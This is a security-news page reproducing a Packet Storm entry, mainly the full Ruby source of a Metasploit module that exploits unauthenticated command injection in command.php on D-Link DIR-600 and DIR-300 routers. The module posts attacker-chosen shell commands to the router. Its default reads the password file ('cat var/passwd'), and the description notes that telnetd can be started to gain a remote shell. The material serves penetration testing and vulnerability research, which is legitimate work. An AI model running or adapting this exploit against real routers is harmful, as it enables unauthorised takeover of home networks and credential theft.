Security
Headlines
HeadlinesLatestCVEs

Headline

D-Link DIR-600 / DIR-300 Unauthenticated Remote Command Execution

This Metasploit module exploits an OS Command Injection vulnerability in some D-Link Routers like the DIR-600 rev B and the DIR-300 rev B. The vulnerability exists in command.php, which is accessible without authentication. This Metasploit module has been tested with the versions DIR-600 2.14b01 and below, DIR-300 rev B 2.13 and below. In order to get a remote shell the telnetd could be started without any authentication.

Packet Storm
#vulnerability#web#linux#git#php#auth#telnet
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  def initialize(info = {})    super(      update_info(        info,        'Name' => 'D-Link DIR-600 / DIR-300 Unauthenticated Remote Command Execution',        'Description' => %q{          This module exploits an OS Command Injection vulnerability in some D-Link          Routers like the DIR-600 rev B and the DIR-300 rev B. The vulnerability exists in          command.php, which is accessible without authentication. This module has been          tested with the versions DIR-600 2.14b01 and below, DIR-300 rev B 2.13 and below.          In order to get a remote shell the telnetd could be started without any          authentication.        },        'Author' => [ 'Michael Messner <devnull[at]s3cur1ty.de>' ],        'License' => MSF_LICENSE,        'References' => [          [ 'OSVDB', '89861' ],          [ 'EDB', '24453' ],          [ 'URL', 'https://eu.dlink.com/uk/en/products/dir-600-wireless-n-150-home-router' ],          [ 'URL', 'http://www.s3cur1ty.de/home-network-horror-days' ],          [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-003' ]        ],        'DisclosureDate' => '2013-02-04'      )    )    register_options(      [        Opt::RPORT(80),        OptString.new('CMD', [ true, 'The command to execute', 'cat var/passwd'])      ]    )  end  def run    uri = '/command.php'    print_status("#{rhost}:#{rport} - Sending remote command: " + datastore['CMD'])    data_cmd = "cmd=#{datastore['CMD']}; echo end"    begin      res = send_request_cgi(        {          'uri' => uri,          'method' => 'POST',          'data' => data_cmd        }      )      return if res.nil?      return if (res.headers['Server'].nil? || res.headers['Server'] !~ (%r{Linux,\ HTTP/1.1,\ DIR}))      return if res.code == 404    rescue ::Rex::ConnectionError      vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")      return    end    if res.body.include?('end')      print_good("#{rhost}:#{rport} - Exploited successfully\n")      print_line("#{rhost}:#{rport} - Command: #{datastore['CMD']}\n")      print_line("#{rhost}:#{rport} - Output: #{res.body}")    else      print_error("#{rhost}:#{rport} - Exploit failed")    end  endend

Packet Storm: Latest News

Scapy Packet Manipulation Tool 2.6.1